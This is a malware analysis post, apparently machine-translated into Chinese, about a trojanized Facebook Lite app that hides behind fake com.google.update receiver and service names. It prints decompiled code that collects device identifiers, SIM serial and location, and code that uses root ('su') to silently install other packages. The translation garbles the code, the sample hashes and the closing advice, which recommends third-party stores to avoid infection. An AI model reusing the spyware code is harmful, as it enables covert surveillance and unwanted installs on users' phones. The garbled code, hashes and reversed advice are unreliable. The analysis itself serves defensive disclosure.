热门手机应用Facebook的一个版本被发现感染了Android/木马。spy . fakeplay。Facebook Lite是这款流行应用的精简版,使用更少的数据,并声称可以在所有网络条件下工作(即在网络条件较差的地方)。

受感染的Facebook Lite可以像宣传的那样工作,但添加了恶意活动。它通过使用恶意的接收机com.google.update.LaunchReceiver服务com.google.update.GetInst.注意,使用接收者和服务名称试图隐藏在一些人可能认为是谷歌更新;一些未经训练的眼睛可能捕捉不到的东西。

服务com.google.update.LaunchReceiver每当电话启动时运行,并立即运行接收器com.google.update.GetInst。

从Android设备监视器的日志条目

接收机com.google.update.GetInst包含大部分恶意代码。下面是一些窃取个人信息并安装恶意应用程序的代码。

窃取和发送设备ID、系统版本、MAC地址、手机型号、位置等的代码
WifiInfo localWifiInfo = ((wifiimanager)getSystemService("wifi")).getConnectionInfo();
HashMap localHashMap = new HashMap();
localHashMap。put("的DeviceId " paramTelephonyManager.getDeviceId ());
localHashMap。把(“SystemVersion”,Build.VERSION.RELEASE);
localHashMap。put(“苹果”,localWifiInfo.getMacAddress ());
localHashMap。把(“PhoneType”,Build.MODEL);
localHashMap。put (" NetworkOperatorName ", paramTelephonyManager.getNetworkOperatorName ());
localHashMap。put (" SimSerialNumber ", paramTelephonyManager.getSimSerialNumber ());
localHashMap。把(“位置”,());

安装其他应用程序的代码:
localProcess = Runtime.getRuntime () .exec(“苏”);
PrintWriter localPrintWriter = new PrintWriter(localProcess.getOutputStream());
localPrintWriter。println("chmod 777 " + paramString);
localPrintWriter。println(“出口LD_LIBRARY_PATH = /供应商/ lib /系统/ lib”);
localPrintWriter。println("pm install -r " + paramString);
localPrintWriter.flush ();
localPrintWriter.close ();

的字面意思木马在计算方面引用了维基百科通过误导用户了解其真实意图而入侵计算机的恶意计算机程序.这个手机恶意软件就是一个很好的例子;它通过用恶意代码感染一个合法的应用程序来误导用户,然后将其隐藏在知名企业的名下。

这个受感染的Facebook Lite版本源自中国,基于代码中发现的字符。中国无法访问谷歌Play,并依赖于第三方应用商店,这些商店有时包含类似这样的恶意应用。如果你在一个国家可以使用谷歌Play,我们建议你通过第三方应用商店使用它,以避免此类感染。在外面注意安全!

恶意MD5样本:
5345429 ab24bb132cfaace51eff63c84
628235 e3c56651c72326d8f5c713dbc6